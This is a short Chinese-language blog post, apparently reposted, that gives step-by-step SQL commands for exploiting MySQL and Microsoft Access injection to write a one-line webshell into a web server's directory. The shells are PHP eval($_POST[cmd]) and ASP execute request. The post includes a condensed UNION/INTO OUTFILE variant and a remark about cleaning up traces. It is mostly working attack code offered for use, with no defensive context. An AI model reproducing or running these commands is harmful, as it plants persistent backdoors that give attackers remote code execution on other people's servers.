MySQL/ACCESS导出一句话拿WebShell后门命令
MySQL:
Drop TABLE IF EXISTS temp; //如果存在temp就删掉
Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段
Insert INTO temp (cmd) VALUES(<? php eval($_POST[cmd]);?>); //把一句话木马插入到temp表
Select cmd from temp into out file F:/wwwroot/eval.php; //查询temp表中的一句话并把结果导入到eval.php
Drop TABLE IF EXISTS temp; //删除temp(擦屁股o(∩_∩)o...)
这几句SQL很简单,我做了简单的注释。
不过想想我们在测试PHP的SQL漏洞的时候经常用如下的语句:
/**/UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12/*
然后返回的页面中可能会出现1~12之间的数字。这里加入数字3显示出来了。
如果我们把上面这句改成/**/UNION SELECT 1,2,zerosoul,4,5,6,7,8,9,10,11,12/*,则返回页面上次显示3的地方会显示zerosoul。
也就是说如果我们的select语句后面不带from table语句的话,我们说查询的数字或字符会直接返回到查询结果里。
既然这样,我们为何还要那么麻烦去建一个表,先导入数据,再导出这样折腾呢。
有了这个思路,上面那一大段到出一句话的SQL代码可以直接简化到一句:
Select <? php eval($_POST[cmd]);?> into outfile F:/wwwroot/eval.php;
这样做不但简单明了,而且避免了误删别人的数据。
ACCESS:
create table cmd (a varchar(50))
insert into cmd (a) values (‘<%execute request("s")%>‘)
select * into [a] in ‘E:\wz\ysnews1\a.asp;.xls‘ ‘excel 4.0;‘ from cmd
drop table cmd
本文出自 “tree's blog” 博客,请务必保留此出处http://shuzi.blog.51cto.com/3685900/1594053
郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。